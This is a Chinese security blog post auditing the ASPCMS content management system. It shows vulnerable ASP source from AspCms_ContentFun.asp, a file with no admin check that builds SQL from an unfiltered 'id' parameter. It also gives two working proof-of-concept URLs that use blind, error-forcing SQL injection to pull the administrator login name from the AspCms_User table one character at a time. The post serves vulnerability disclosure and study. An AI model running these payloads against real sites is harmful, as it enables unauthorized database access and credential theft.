您的位置 » 首页 » 代码审计 » 代码审计:ASPCMSSQL注入漏洞附利用测试(AspCms_ContentFun.asp)

代码审计:ASPCMSSQL注入漏洞附利用测试(AspCms_ContentFun.asp)

发表于3年前 | 作者: seay | 分类: 代码审计 | 孵化于:2013年11月13日 | 文章热度:4,613 次 全屏阅读

显示不全请点击全屏阅读

ASPCMS系统对用户提交的参数过滤不严,导致攻击者可以提交SQL语句查询数据库获取敏感信息。

漏洞存在于/admin_aspcms/_content/_Content/AspCms_ContentFun.asp,这个文件未验证管理员权限,因此如何人都可以访问,同时该文件对获取的参数没有使用自定义的filterPara函数过滤,导致多处注入,代码入下:
<!--#include file="../../inc/AspCms_SettingClass.asp" --> 
  
<!--#include file="../../editor/fckeditor.asp" --> 
  
<% 
  
'die debugmode 
  
dim action : action=getForm("action","get") 
  
dim ContentID, LanguageID, SortID, GroupID, Exclusive, Title, Title2, TitleColor, IsOutLink, OutLink, Author, ContentSource, ContentTag, Content, ContentStatus, IsTop, IsRecommend, IsImageNews, IsHeadline, IsFeatured, ContentOrder, IsGenerated, Visits, AddTime, ImagePath, IndexImage, DownURL, PageTitle, PageKeywords, PageDesc, PageFileName, spec, EditTime,DownGroupID,IsNoComment,Star,Timeing,TimeStatus,VideoGroupID,CHvalue,SpecCategory 
  
'SpecCategory用于判断是哪个类型的自定义参数 
  
dim sortType, keyword, page, psize, order, ordsc, sortTypeName 
  
sortType=getForm("sortType","get") 
  
if isnul(sortType) then sortType=0  
  
sortid=getForm("sortid","post")  
  
if isnul(sortid) then sortid=getForm("sortid","get") 
  
keyword=getForm("keyword","post") 
  
if isnul(keyword) then keyword=getForm("keyword","get") 
  
page=getForm("page","get") 
  
psize=getForm("psize","get") 
  
order=getForm("order","get") 
  
ordsc=getForm("ordsc","get") 
  
DownGroupID=getForm("DownGroupID","post") 
  
VideoGroupID=getForm("VideoGroupID","post") 
  
  
  
select case sortType 
  
case "2"
  
sortTypeName ="文章"
  
SpecCategory = "C"
  
case "3"
  
sortTypeName ="产品"
  
SpecCategory = "P"
  
case "4"
  
sortTypeName ="下载"
  
SpecCategory = "DL"
  
case "5"
  
sortTypeName ="招聘"
  
SpecCategory = "HR"
  
case "6"
  
sortTypeName ="相册"
  
SpecCategory = "FO"
  
  
  
case "8"
  
sortTypeName = "视频"
  
SpecCategory = "VI"
  
  
  
end select  
  
'单篇1,文章2,产品3,下载4,招聘5,相册6,链接7,视频8 
  
  
  
Select case action 
  
case "add" : addContent  
  
case "edit" : editContent  
  
case "move" : moveContent 
  
case "copy" : copyContent 
  
case "rpost" : rpostContent  
  
case "del" : delContent  
  
case "recovery" : Recovery  
  
case "tdel" : trueDelContent 
  
case "on" : onOff "on", "Content", "ContentID", "ContentStatus", "", getPageName()&"?sortType="&sortType&"&sortid="&sortid&"&keyword="&keyword&"&page="&page&"&psize="&psize&"&order="&order&"&ordsc="&ordsc 
  
case "off" : onOff "off", "Content", "ContentID", "ContentStatus", "", getPageName()&"?sortType="&sortType&"&sortid="&sortid&"&keyword="&keyword&"&page="&page&"&psize="&psize&"&order="&order&"&ordsc="&ordsc 
  
  
  
case "order" : UpdateOrder 
  
  
  
End Select
 
 
Sub trueDelContent 
  
dim id : id=getForm("id","both") 
  
if isnul(id) then alertMsgAndGo "请选择要操作的内容","-1"
  
if runmode=1 then 
  
dim rs, sql, filepath 
  
dim templateobj : set templateobj=new TemplateClass 
  
sql="select ContentID,Title,sortType,SortFolder,a.GroupID,ContentFolder,ContentFileName,a.AddTime,a.PageFileName,a.SortID,b.GroupID from {prefix}Content as a, {prefix}Sort as b where a.LanguageID="&session("languageID")&" and a.SortID=b.SortID and ContentStatus=2 and ContentID in("&id&")"
  
set rs=conn.exec(sql,"r1")  
  
do while not rs.eof 
  
  
  
filepath=templateobj.getContentLink(rs("SortID"),rs("ContentID"),rs("SortFolder"),rs("a.GroupID"),rs("ContentFolder"),rs("ContentFileName"),rs("AddTime"),rs("PageFileName"),rs("b.GroupID")) 
  
if isExistFile(filepath) then delFile filepath  
  
'echo filepath&"<br>" 
  
rs.movenext 
  
loop 
  
end if 
  
conn.exec "delete from {prefix}Content where ContentStatus=2 and ContentID in("&id&")","exe"
  
alertMsgAndGo "彻底删除成功",getPageName()&"?sortType="&sortType&"&sortid="&sortid&"&keyword="&keyword&"&page="&page&"&psize="&psize&"&order="&order&"&ordsc="&ordsc 
  
End Sub
 
利用比较简单,利用iif来强制报错:
 
http://192.168.116.130/aspcms/admin_aspcms/_content/_Content/AspCms_ContentFun.asp?action=tdel&id=2=iif(((select asc(mid(LoginName,1,1)) from AspCms_User where UserID=1)=97),2,chr(97))
 
查询管理员用户名第一个字符是否为a
 

 
http://192.168.116.130/aspcms/admin_aspcms/_content/_Content/AspCms_ContentFun.asp?action=tdel&id=2=iif(((select asc(mid(LoginName,1,1)) from AspCms_User where UserID=1)=98),2,chr(97))
 
查询管理员用户名第一个字符是否为b
 
如图,返回为假,强制报错:
作者:My5t3ry

Tags:

aspcms注入漏洞, 代码审计,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/3485/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)